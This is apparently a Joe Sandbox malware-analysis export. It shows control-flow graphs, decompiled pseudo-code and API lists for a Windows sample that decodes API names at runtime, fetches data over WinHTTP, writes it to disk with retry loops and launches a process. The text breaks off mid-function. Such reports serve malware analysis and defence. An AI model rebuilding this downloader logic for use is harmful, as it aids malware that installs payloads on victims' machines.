    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 500 394bf0-394c4b call 39e520 call 399090 506 394ef8-394efb 500->506 507 394c51-394c87 call 399090 call 3a0c10 500->507 508 394eff-394f01 506->508 507->506 525 394c8d-394c93 507->525 510 394f10-394f15 508->510 511 394f03-394f0c call 39bb40 508->511 515 394f20-394f28 510->515 516 394f17-394f1d call 39bb40 510->516 511->510 517 394f2a-394f30 call 39bb40 515->517 518 394f33-394f41 call 397ad0 515->518 516->515 517->518 528 394c99-394c9b 525->528 529 394eea-394ef4 525->529 530 394ca0-394cab 528->530 529->508 531 394cb9-394cbe 530->531 532 394cad-394cb6 call 39bb40 530->532 534 394ccc-394d06 call 399090 call 3a0c10 531->534 535 394cc0-394cc1 call 39bb40 531->535 532->531 534->506 543 394d0c-394d49 call 39ed90 _time64 534->543 539 394cc6-394cc9 535->539 539->534 546 394d4f 543->546 547 394ed5-394ee4 543->547 548 394d59-394d83 _time64 546->548 549 394d51-394d53 546->549 547->529 547->530 548->547 550 394d89 548->550 549->547 549->548 551 394d8b-394d8d 550->551 552 394d93-394da0 call 3a1840 550->552 551->547 551->552 552->547 555 394da6-394dab 552->555 556 394dad-394db3 call 39bb40 555->556 557 394db6-394dc4 call 39df10 555->557 556->557 562 394dc6-394de9 call 395a10 557->562 565 394deb-394dfa Sleep 562->565 566 394e01-394e06 562->566 565->562 567 394dfc 565->567 568 394e0c-394e11 566->568 569 394f0e 566->569 567->547 570 394efd 568->570 571 394e17-394e34 call 399f70 568->571 569->510 570->508 574 394e3a-394e52 GetFileAttributesW 571->574 575 394ef6 571->575 576 394e92-394ea1 call 391a80 574->576 577 394e54-394e8f CreateDirectoryW 574->577 575->506 579 394ea6-394ec0 _time64 576->579 577->576 579->547 581 394ec2-394ed0 call 392e90 579->581 581->547
    C-Code - Quality: 60%
    			E00394BF0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				char _v40;
    				char _v56;
    				char _v256;
    				short _v780;
    				char _v1304;
    				char _v1828;
    				intOrPtr _t97;
    				void* _t98;
    				char _t99;
    				void* _t110;
    				char _t112;
    				void* _t116;
    				void* _t117;
    				intOrPtr _t118;
    				void* _t123;
    				intOrPtr _t125;
    				void* _t130;
    				void* _t137;
    				intOrPtr _t139;
    				long _t141;
    				intOrPtr _t143;
    				void* _t157;
    				void* _t168;
    				void* _t170;
    				intOrPtr _t176;
    				intOrPtr _t181;
    				intOrPtr _t184;
    				intOrPtr _t186;
    				char* _t192;
    				signed int _t193;
    				signed int _t195;
    				char* _t202;
    				char _t208;
    				void* _t212;
    				void* _t214;
    				void* _t216;
    				void* _t217;
    				void* _t219;
    				void* _t226;
    				void* _t228;
    
    				_t219 = __eflags;
    				_t208 = 0;
    				_t214 = __ecx;
    				_v12 = 0;
    				_v8 = 0;
    				_v40 = 0;
    				_v20 = 0;
    				_v28 = 0;
    				_v16 = 0;
    				E0039E520( &_v56); // executed
    				E00399090(_t219,  &_v256, 0x71);
    				_t97 =  *0x3b8628; // 0x593938
    				_t217 = _t216 + 8;
    				_t98 =  *((intOrPtr*)( *((intOrPtr*)(_t97 + 0x10))))( &_v256, 0x105,  &_v1828, 0, __edi, __esi, __ebx);
    				_t220 = _t98;
    				if(_t98 == 0) {
    					L32:
    					_t99 = _v8;
    					L34:
    					if(_t99 != _t208) {
    						E0039BB40(_t99);
    						_t217 = _t217 + 4;
    					}
    					L37:
    					_t100 = _v12;
    					if(_v12 != _t208) {
    						E0039BB40(_t100);
    						_t217 = _t217 + 4;
    					}
    					_t101 = _v16;
    					if(_v16 != _t208) {
    						E0039BB40(_t101);
    					}
    					E00397AD0( &_v56);
    					return _v28;
    				}
    				E00399090(_t220,  &_v256, 0x72);
    				_t13 = _t214 + 0x10; // 0xa06850ff
    				_push( *_t13);
    				_t110 = E003A0C10( &_v780, 0x105,  &_v256,  &_v1828);
    				_t217 = _t217 + 0x1c;
    				if(_t110 < 0) {
    					goto L32;
    				}
    				_v24 = 0;
    				if( *((intOrPtr*)(_t214 + 0x20)) <= 0) {
    					L30:
    					_t99 = _v8;
    					_v28 = 1;
    					goto L34;
    				} else {
    					_t157 = 0;
    					while(1) {
    						_t111 = _v12;
    						_v36 = _t208;
    						_v32 = _t208;
    						if(_v12 != _t208) {
    							E0039BB40(_t111);
    							_t217 = _t217 + 4;
    							_v12 = _t208;
    						}
    						_t112 = _v8;
    						_t224 = _t112 - _t208;
    						if(_t112 != _t208) {
    							E0039BB40(_t112); // executed
    							_t217 = _t217 + 4;
    							_v8 = _t208;
    						}
    						E00399090(_t224,  &_v256, 0x73);
    						_t26 = _t214 + 0x28; // 0x5d89ec5d
    						_push( *((intOrPtr*)( *_t26 + _t157 + 4)));
    						_t116 = E003A0C10( &_v1304, 0x105,  &_v256,  &_v780);
    						_t217 = _t217 + 0x1c;
    						if(_t116 < 0) {
    							goto L32;
    						}
    						_t192 =  &_v1304;
    						_t117 = E0039ED90(_t192, _t208, _t208,  &_v36); // executed
    						__imp___time64(_t208);
    						_t34 = _t214 + 0x28; // 0x5d89ec5d
    						_t118 =  *_t34;
    						_t217 = _t217 + 0x14;
    						_t168 = _t117 -  *((intOrPtr*)(_t118 + _t157 + 0x10));
    						asm("sbb edi, [eax+ebx+0x14]");
    						_t193 =  *(_t118 + _t157 + 8);
    						_t123 = (_t193 << 4) - _t193 + (_t193 << 4) - _t193 + (_t193 << 4) - _t193 + (_t193 << 4) - _t193;
    						asm("cdq");
    						_t226 = _t192 - _t193;
    						if(_t226 < 0 || _t226 <= 0 && _t168 <= _t123) {
    							L29:
    							_t125 = _v24 + 1;
    							_t157 = _t157 + 0x18;
    							_t208 = 0;
    							_v24 = _t125;
    							_t86 = _t214 + 0x20; // 0xd05d8953
    							if(_t125 <  *_t86) {
    								continue;
    							}
    							goto L30;
    						} else {
    							__imp___time64(0);
    							_t39 = _t214 + 0x28; // 0x5d89ec5d
    							_t195 =  *( *_t39 + _t157 + 8);
    							_t130 = (_t195 << 4) - _t195 + (_t195 << 4) - _t195 + (_t195 << 4) - _t195 + (_t195 << 4) - _t195;
    							_t217 = _t217 + 4;
    							_t170 = _t123 - _v36;
    							asm("cdq");
    							asm("sbb edi, [ebp-0x1c]");
    							_t228 = _t193 - _t195;
    							if(_t228 >= 0 && (_t228 > 0 || _t170 > _t130)) {
    								_t43 = _t214 + 0x44; // 0x89c933ff
    								if(E003A1840( *((intOrPtr*)( *_t43 + 8))) == 0) {
    									goto L29;
    								}
    								_t133 = _v16;
    								if(_v16 != 0) {
    									E0039BB40(_t133);
    									_t217 = _t217 + 4;
    								}
    								_t46 = _t214 + 0x44; // 0x89c933ff
    								_v16 = E0039DF10( *((intOrPtr*)( *_t46 + 8)));
    								_t212 = 0;
    								while(1) {
    									_t49 = _t214 + 0x28; // 0x5d89ec5d
    									_push( &_v20);
    									_push( &_v8);
    									_t54 = _t214 + 0x44; // 0x89c933ff
    									_push( *((intOrPtr*)( *_t49 + _t157 + 4)));
    									_push(5);
    									_push( *((intOrPtr*)( *_t54 + 8))); // executed
    									_t137 = E00395A10(); // executed
    									_t217 = _t217 + 0x14;
    									if(_t137 != 0) {
    										break;
    									}
    									Sleep(0x1388);
    									_t212 = _t212 + 1;
    									if(_t212 < 5) {
    										continue;
    									}
    									goto L29;
    								}
    								_t99 = _v8;
    								__eflags = _t99;
    								if(_t99 == 0) {
    									_t208 = 0;
    									__eflags = 0;
    									goto L37;
    								}
    								_t176 = _v20;
    								__eflags = _t176;
    								if(_t176 == 0) {
    									_t208 = 0;
    									__eflags = 0;
    									goto L34;
    								}
    								_t60 = _t214 + 0x44; // 0x89c933ff
    								_t139 = E00399F70( &_v56,  *((intOrPtr*)( *((intOrPtr*)( *_t60 + 8)))), _t99, _t176,  &_v12,  &_v40); // executed
    								__eflags = _t139;
    								if(_t139 == 0) {
    									_t208 = 0;
    									__eflags = 0;
    									goto L32;
    								}
    								_t141 = GetFileAttributesW( &_v780); // executed
    								__eflags = _t141 - 0xffffffff;
    								if(_t141 == 0xffffffff) {
    									_t184 =  *0x3b8628; // 0x593938
    									 *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x1e4))))( &_v780);
    									CreateDirectoryW( &_v780, 0);
    									_t186 =  *0x3b8628; // 0x593938
    									 *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x1d8))))( &_v780);
    								}
    								_t202 =  &_v1304;
    								_t143 = E00391A80(_v8, _t202, _v8, _v20); // executed
    								__imp___time64(0);
    								_t74 = _t214 + 0x28; // 0x5d89ec5d
    								_t181 =  *_t74;
    								_t217 = _t217 + 0x10;
    								__eflags = _a4;
    								 *((intOrPtr*)(_t181 + _t157 + 0x10)) = _t143;
    								 *((intOrPtr*)(_t181 + _t157 + 0x14)) = _t202;
    								if(__eflags == 0) {
    									_t80 = _t214 + 0x28; // 0x5d89ec5d
    									E00392E90(_t214,  *((intOrPtr*)( *_t80 + _t157 + 4)),  *((intOrPtr*)( *_t80 + _t157)));
    								}
    							}
    							goto L29;
    						}
    					}
    					goto L32;
    				}
    			}

    APIs
      • Part of subcall function 0039E520: CoCreateInstance.OLE32(003B32CC,00000000,00000001,003B32DC,00000000,00396A37,?,00000000), ref: 0039E55C
      • Part of subcall function 0039ED90: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0039FE81,?,00394D1E,?,00000000,00000000,?), ref: 0039EDB6
    • _time64.MSVCRT ref: 00394D1F
    • _time64.MSVCRT ref: 00394D5B
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • Sleep.KERNEL32(00001388), ref: 00394DF0
    • GetFileAttributesW.KERNELBASE(?,0039FE81,00391E57,00000001,0039FE81,?), ref: 00394E4D
    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00394E7B
      • Part of subcall function 00391A80: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
      • Part of subcall function 00391A80: WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    • _time64.MSVCRT ref: 00394EA8
      • Part of subcall function 00392E90: GetFileAttributesW.KERNELBASE(?), ref: 00392F93
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 583 3b1510-3b1532 585 3b1538-3b153d 583->585 586 3b162c-3b1631 583->586 587 3b1549-3b15a3 WinHttpSetTimeouts call 399090 WinHttpOpenRequest 585->587 588 3b153f-3b1546 WinHttpCloseHandle 585->588 589 3b163a-3b1649 586->589 590 3b1633-3b1634 WinHttpCloseHandle 586->590 587->586 593 3b15a9-3b15ac 587->593 588->587 590->589 594 3b15c8-3b15e9 WinHttpSendRequest 593->594 595 3b15ae-3b15c6 WinHttpSetOption 593->595 594->586 596 3b15eb-3b15f8 WinHttpReceiveResponse 594->596 595->586 595->594 596->586 597 3b15fa-3b1615 WinHttpQueryHeaders 596->597 597->586 598 3b1617-3b1629 597->598
    APIs
    • WinHttpCloseHandle.WINHTTP(?), ref: 003B1540
    • WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,002932E0,0002BF20), ref: 003B1561
    • WinHttpOpenRequest.WINHTTP(00000004,?,00000004,00000000,00000000,00000000,?), ref: 003B1598
    • WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 003B15BE
    • WinHttpSendRequest.WINHTTP(?,?,?,?,?,?,00000000), ref: 003B15E1
    • WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 003B15F0
    • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 003B160D
    • WinHttpCloseHandle.WINHTTP(?), ref: 003B1634
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E003A1D90(long _a4, void* _a8) {
    				char _v104;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    				_Unknown_base(*)()* _t22;
    				_Unknown_base(*)()* _t24;
    				_Unknown_base(*)()* _t28;
    				_Unknown_base(*)()* _t31;
    				void* _t32;
    				struct HINSTANCE__* _t49;
    
    				_t14 =  *0x3b862c; // 0x290000
    				if(_t14 != 0) {
    					L7:
    					_t32 = _a8;
    					if(_t32 == 0) {
    						_t15 = RtlAllocateHeap(_t14, 8, _a4); // executed
    						return _t15;
    					} else {
    						_t16 = RtlReAllocateHeap(_t14, 8, _t32, _a4); // executed
    						return _t16;
    					}
    				} else {
    					E00396CB0( &_v104, 0x6c);
    					_t49 = LoadLibraryA( &_v104);
    					E00396CB0( &_v104, 0x6d);
    					_t22 = GetProcAddress(_t49,  &_v104);
    					 *0x3b8630 = _t22;
    					if(_t22 != 0) {
    						E00396CB0( &_v104, 0x6e);
    						_t24 = GetProcAddress(_t49,  &_v104);
    						 *0x3b863c = _t24;
    						if(_t24 == 0) {
    							goto L2;
    						} else {
    							E00396CB0( &_v104, 0x6f);
    							_t28 = GetProcAddress(_t49,  &_v104);
    							 *0x3b8638 = _t28;
    							if(_t28 == 0) {
    								goto L2;
    							} else {
    								E00396CB0( &_v104, 0x70);
    								_t31 = GetProcAddress(_t49,  &_v104);
    								 *0x3b8634 = _t31;
    								if(_t31 == 0) {
    									goto L2;
    								} else {
    									_t14 = GetProcessHeap();
    									 *0x3b862c = _t14;
    									goto L7;
    								}
    							}
    						}
    					} else {
    						L2:
    						return 0;
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(?), ref: 003A1DB7
    • GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
    • GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
    • GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
    • GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
    • GetProcessHeap.KERNEL32 ref: 003A1E45
    • RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
    • RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 619 39fee0-39fef4 call 3994d0 621 39fef9-39fefb 619->621 622 39fefd-39ff10 621->622 623 39ff15-39ff3e _time64 621->623 630 3a0374-3a038a 622->630 624 39ffac-39ffbd call 3a1b80 623->624 625 39ff40 623->625 631 39ffc2-39ffc7 624->631 628 39ff49-39ff58 call 39d890 625->628 629 39ff42-39ff47 625->629 635 39ff5d-39ff62 628->635 629->624 629->628 630->619 636 3a0390-3a03c4 call 3b0a40 call 3b0d30 630->636 633 39ffc9-39ffcc 631->633 634 39fff6-3a0012 631->634 638 39ffde-39fff1 633->638 639 39ffce-39ffdb call 39c870 633->639 642 3a0041-3a0053 call 3942a0 call 3a12c0 634->642 643 3a0014 634->643 640 39ff90-39ffa8 635->640 641 39ff64-39ff67 635->641 674 3a03cc-3a03ef call 391700 call 39f850 call 39c930 636->674 638->630 639->638 640->624 647 39ff79-39ff8b 641->647 648 39ff69-39ff76 call 39c870 641->648 665 3a0058-3a005c 642->665 649 3a001d-3a002b call 39ac90 643->649 650 3a0016-3a001b 643->650 662 3a0372 647->662 648->647 658 3a0030-3a0035 649->658 650->642 650->649 658->630 663 3a003b-3a003e 658->663 662->630 663->642 667 3a005e-3a008f call 399090 * 2 665->667 668 3a0091 665->668 687 3a00f7 call 395a10 667->687 670 3a0093-3a00c4 call 399090 * 2 668->670 671 3a00c6-3a00db call 399090 * 2 668->671 670->687 685 3a00e0-3a00f6 671->685 698 3a04eb-3a04f6 call 399480 call 397e10 ExitProcess 674->698 699 3a03f5-3a0440 call 398030 call 3a1d90 674->699 685->687 690 3a00fc-3a00ff 687->690 692 3a0102-3a0119 _time64 690->692 694 3a011b-3a0128 692->694 695 3a0133-3a0146 call 3936e0 692->695 700 3a012a 694->700 701 3a016b-3a0178 694->701 702 3a014b-3a0164 695->702 734 3a0442-3a044c 699->734 735 3a0495-3a04e9 call 39bb40 699->735 700->695 706 3a012c-3a0131 700->706 704 3a017a 701->704 705 3a01d3-3a01dc 701->705 702->701 707 3a0166 702->707 709 3a017c-3a0181 704->709 710 3a0183-3a01a0 704->710 712 3a028f-3a029c call 399890 705->712 713 3a01e2 705->713 706->695 706->701 707->701 709->705 709->710 710->705 716 3a01a2 710->716 712->662 727 3a02a2-3a02b5 call 395a10 
712->727 718 3a01f0-3a020a call 39f2d0 call 3999a0 713->718 719 3a01e4-3a01ea 713->719 723 3a01ab-3a01c3 call 391fe0 716->723 724 3a01a4-3a01a9 716->724 740 3a023f-3a026f call 399090 * 2 718->740 741 3a020c-3a023d call 399090 * 2 718->741 719->712 719->718 733 3a01c8-3a01cd 723->733 724->705 724->723 727->662 743 3a02bb-3a02cc call 397560 727->743 733->705 738 3a0344-3a035b call 3a0ad0 733->738 739 3a0450-3a046c 734->739 735->698 738->674 752 3a035d-3a0367 738->752 755 3a046e-3a0483 739->755 768 3a0270-3a028c call 395a10 call 39bb40 _time64 740->768 741->768 758 3a0369-3a0370 743->758 759 3a02d2-3a02d9 743->759 752->662 766 3a0493 755->766 767 3a0485-3a0490 755->767 758->662 758->674 759->674 764 3a02df-3a02eb 759->764 769 3a02fc-3a0301 764->769 770 3a02ed-3a02fa 764->770 766->735 767->766 768->712 772 3a0303-3a030c 769->772 774 3a0310-3a0318 769->774 770->772 772->774 777 3a031a-3a0330 774->777 778 3a0332-3a033c 774->778 777->774 777->778 778->692 780 3a0342 778->780 780->662
    C-Code - Quality: 47%
    			E0039FEE0() {
    				void* _t142;
    				intOrPtr _t144;
    				signed int* _t145;
    				signed int* _t147;
    				signed int* _t150;
    				void* _t152;
    				signed int* _t156;
    				intOrPtr _t157;
    				signed int* _t159;
    				signed int* _t161;
    				signed int* _t162;
    				intOrPtr _t163;
    				void* _t165;
    				signed int* _t171;
    				signed int* _t172;
    				signed int* _t180;
    				signed int* _t189;
    				signed int _t191;
    				signed int* _t192;
    				signed int* _t196;
    				signed int* _t198;
    				intOrPtr _t204;
    				signed int* _t210;
    				signed int* _t212;
    				signed int* _t213;
    				signed int* _t215;
    				signed int* _t225;
    				signed int* _t230;
    				intOrPtr _t231;
    				signed int* _t232;
    				void* _t235;
    				int _t238;
    				signed int* _t239;
    				signed int _t240;
    				signed int _t255;
    				signed int _t256;
    				signed int _t271;
    				signed int _t272;
    				signed int* _t287;
    				signed int _t289;
    				signed int* _t292;
    				signed int _t293;
    				signed int* _t298;
    				signed int* _t302;
    				signed int* _t304;
    				signed int* _t306;
    				signed int* _t307;
    				signed int* _t308;
    				signed short* _t309;
    				intOrPtr _t312;
    				signed int _t314;
    				signed int _t321;
    				signed int* _t323;
    				signed int* _t324;
    				intOrPtr _t325;
    				signed int* _t327;
    				signed int* _t328;
    				void* _t329;
    				void* _t330;
    				void* _t331;
    				void* _t332;
    				void* _t333;
    				void* _t334;
    				void* _t335;
    
    				L0:
    				while(1) {
    					L0:
    					_t292 =  *( *((intOrPtr*)(_t142 + 0x20)) + _t240 * 4);
    					_t144 = L003994D0(_t329 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x1c)) + _t240 * 4)), _t292); // executed
    					if(_t144 != 0) {
    						goto L4;
    					} else {
    						_t302 =  *0x3b8628; // 0x593938
    						 *(_t302[0x32])(0x3e8);
    					}
    					L63:
    					_t255 =  *0x3b857c; // 0x1
    					_t163 =  *((intOrPtr*)(_t329 - 0x5b8));
    					_t256 = 1 + _t255;
    					 *0x3b857c = _t256;
    					_t341 = _t256 -  *((intOrPtr*)(_t163 + 0x18));
    					if(_t256 <  *((intOrPtr*)(_t163 + 0x18))) {
    						do {
    							L0:
    							_t292 =  *( *((intOrPtr*)(_t142 + 0x20)) + _t240 * 4);
    							_t144 = L003994D0(_t329 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x1c)) + _t240 * 4)), _t292); // executed
    							if(_t144 != 0) {
    								goto L4;
    							} else {
    								_t302 =  *0x3b8628; // 0x593938
    								 *(_t302[0x32])(0x3e8);
    							}
    							goto L63;
    						} while (_t256 <  *((intOrPtr*)(_t163 + 0x18)));
    						do {
    							goto L64;
    						} while ( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x18)) <= _t237);
    						continue;
    					}
    					L64:
    					_t165 = E003B0A40(_t323, _t326, _t341, _t329 - 0xc, _t329 - 0x5b8);
    					_t335 = _t335 + 8;
    					if(_t165 == 0) {
    						_t343 =  *(_t329 - 0x20) - _t237;
    						if( *(_t329 - 0x20) == _t237) {
    							L003B0D30(_t237, _t323, _t326, _t343, _t329 - 0xc, _t329 - 0x5c0);
    							_t335 = _t335 + 8;
    						}
    					}
    					 *0x3b857c = 0;
    					 *(_t329 - 0x20) = _t237;
    					L4:
    					__imp___time64(_t235);
    					_t323 = _t292;
    					_t293 =  *0x3b857c; // 0x1
    					_t331 = _t330 + 4;
    					_t325 = _t144;
    					_t145 = _t144 -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x24)) + _t293 * 8));
    					__eflags = _t145;
    					asm("sbb ebx, [ecx+edx*8+0x4]");
    					 *(_t329 - 0x48) = _t323;
    					if(__eflags < 0) {
    						L12:
    						_t237 = 0; // executed
    						_t147 = E003A1B80(_t325, _t329 - 0xc, _t329 - 0x5c0, _t329 - 0x28); // executed
    						_t332 = _t331 + 0xc;
    						__eflags = _t147;
    						if(_t147 == 0) {
    							L16:
    							 *(_t329 - 0x20) =  &(( *(_t329 - 0x20))[0]);
    							 *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5bc)) + 0xc)) =  *((intOrPtr*)(_t329 - 0x28));
    							_t150 = _t325 -  *((intOrPtr*)(_t329 - 0x3c));
    							__eflags = _t150;
    							asm("sbb edx, [ebp-0x38]");
    							 *(_t329 - 0x48) = _t323;
    							if(__eflags < 0) {
    								L21:
    								E003942A0(__eflags, _t329 - 0x5c0); // executed
    								_t333 = _t332 + 4;
    								_t152 = E003A12C0(); // executed
    								_push(4);
    								__eflags = _t152 - _t237;
    								if(__eflags >= 0) {
    									if(__eflags != 0) {
    										_push(_t329 - 0x9c0);
    										E00399090(__eflags);
    										E00399090(__eflags, _t329 - 0xdc0, 7);
    										_push(_t329 - 0xdc0);
    										_push(_t329 - 0x9c0);
    										_push(0xe);
    										_t298 = _t329 - 0x5c0;
    										_push(_t298); // executed
    									} else {
    										_push(_t329 - 0x9c0);
    										E00399090(__eflags);
    										E00399090(__eflags, _t329 - 0xdc0, 6);
    										_push(_t329 - 0xdc0);
    										_t298 = _t329 - 0x9c0;
    										_push(_t298);
    										_push(0xe);
    										_push(_t329 - 0x5c0);
    									}
    								} else {
    									_push(_t329 - 0x9c0);
    									E00399090(__eflags);
    									E00399090(__eflags, _t329 - 0xdc0, 5);
    									_t298 = _t329 - 0xdc0;
    									_push(_t298);
    									_push(_t329 - 0x9c0);
    									_push(0xe);
    									_push(_t329 - 0x5c0);
    								}
    								_t156 = E00395A10(); // executed
    								_t334 = _t333 + 0x20;
    								 *(_t329 - 0x48) = _t237;
    								do {
    									L27:
    									__imp___time64(0);
    									_t326 = _t156;
    									_t157 =  *0x3b8570; // 0x0
    									_t335 = _t334 + 4;
    									_t323 = _t298;
    									__eflags = _t157 - 2;
    									if(_t157 == 2) {
    										L31:
    										_t159 = E003936E0(_t323, _t326, _t329 - 0xc, _t329 - 0x5c0,  *((intOrPtr*)(_t329 - 0x14)),  *(_t329 - 0x10)); // executed
    										_t335 = _t335 + 0x10;
    										asm("sbb edx, 0x0");
    										 *((intOrPtr*)(_t329 - 0x14)) = _t326 - 0x708;
    										 *(_t329 - 0x10) = _t323;
    										__eflags = _t159 - 1;
    										if(_t159 == 1) {
    											 *0x3b85ac = _t159;
    										}
    										L33:
    										_t161 = _t326 -  *(_t329 - 0x44);
    										__eflags = _t161;
    										asm("sbb ecx, [ebp-0x40]");
    										 *(_t329 - 0x5c) = _t323;
    										if(__eflags < 0) {
    											L40:
    											_t326 = _t326 -  *((intOrPtr*)(_t329 - 0x30));
    											__eflags = _t326;
    											asm("sbb edi, [ebp-0x2c]");
    											 *(_t329 - 0x5c) = _t323;
    											if(__eflags < 0) {
    												L47:
    												_t162 = E00399890( *((intOrPtr*)(_t329 - 0x5bc)));
    												__eflags = _t162;
    												if(_t162 == 0) {
    													L62:
    													_t237 = 0;
    													__eflags = 0;
    													goto L63;
    												}
    												L48:
    												_push(1);
    												_push(_t329 - 0x5c0);
    												_t171 = E00395A10();
    												_t335 = _t335 + 8;
    												__eflags = _t171;
    												if(__eflags == 0) {
    													goto L62;
    												}
    												L49:
    												_t298 = _t329 - 0x5c0;
    												_t172 = E00397560(_t237, __eflags, _t298);
    												_t335 = _t335 + 4;
    												__eflags = _t172;
    												if(_t172 == 0) {
    													L61:
    													__eflags =  *0x3b85ac;
    													if( *0x3b85ac != 0) {
    														L67:
    														E00391700(_t329 - 0xc);
    														E0039F850(_t237, _t329 - 0x5c0);
    														E0039C930(_t329 - 4);
    														_t238 = 0;
    														__eflags = 0;
    														__eflags =  *0x3b85ac - _t238; // 0x0
    														if(__eflags == 0) {
    															L81:
    															E00399480();
    															E00397E10();
    															ExitProcess(_t238);
    														} else {
    															L69:
    															_t304 =  *0x3b8628; // 0x593938
    															_t327 = 0;
    															 *((intOrPtr*)(_t329 - 0x70)) = 0;
    															 *((intOrPtr*)(_t329 - 0x6c)) = 0;
    															 *((intOrPtr*)(_t329 - 0x68)) = 0;
    															 *((intOrPtr*)(_t329 - 0x64)) = 0;
    															 *(_t329 - 0x18) = 0;
    															 *((intOrPtr*)(_t329 - 0xb8)) = 0x44;
    															 *(_t304[0x2e])(_t329 - 0xb8);
    															E00398030(_t329 - 0x18);
    															_t180 = E003A1D90(0x20a, 0);
    															_t239 = _t180;
    															__eflags = _t239;
    															if(_t239 == 0) {
    																L80:
    																_t306 =  *0x3b8628; // 0x593938
    																 *(_t306[0x36])( *(_t329 - 0x18), _t327, _t327, _t327, _t327, _t327, _t327, _t239, _t329 - 0xb8, _t329 - 0x70);
    																_t307 =  *0x3b8628; // 0x593938
    																 *(_t307[0x3e])( *((intOrPtr*)(_t329 - 0x70)));
    																_t308 =  *0x3b8628; // 0x593938
    																 *(_t308[0x3e])( *((intOrPtr*)(_t329 - 0x6c)));
    																E0039BB40( *(_t329 - 0x18));
    																_t238 = 0;
    																__eflags = 0;
    																goto L81;
    															}
    															L70:
    															_t309 =  *(_t329 - 0x18);
    															_t328 = 0x104;
    															_t324 = 0;
    															__eflags = 0;
    															while(1) {
    																L71:
    																_t131 =  &(_t328[0x1fffffbe]); // 0x7ffffffe
    																__eflags = _t131;
    																if(_t131 == 0) {
    																	break;
    																}
    																L72:
    																_t271 =  *_t309 & 0x0000ffff;
    																__eflags = _t271;
    																if(_t271 == 0) {
    																	break;
    																}
    																L73:
    																 *_t180 = _t271;
    																_t180 =  &(_t180[0]);
    																_t309 =  &(_t309[1]);
    																_t328 = _t328 - 1;
    																__eflags = _t328;
    																if(_t328 != 0) {
    																	continue;
    																}
    																L74:
    																L76:
    																_t180 = _t180 - 2;
    																__eflags = _t180;
    																_t324 = 0x8007007a;
    																L77:
    																 *_t180 = 0;
    																__eflags = _t324;
    																if(_t324 >= 0) {
    																	_t189 =  *0x3b8628; // 0x593938
    																	 *(_t189[0x7a])(_t239);
    																}
    																_t327 = 0;
    																__eflags = 0;
    																goto L80;
    															}
    															L75:
    															__eflags = _t328;
    															if(_t328 != 0) {
    																goto L77;
    															}
    															goto L76;
    														}
    													}
    													goto L62;
    												}
    												L50:
    												__eflags =  *0x3b85ac;
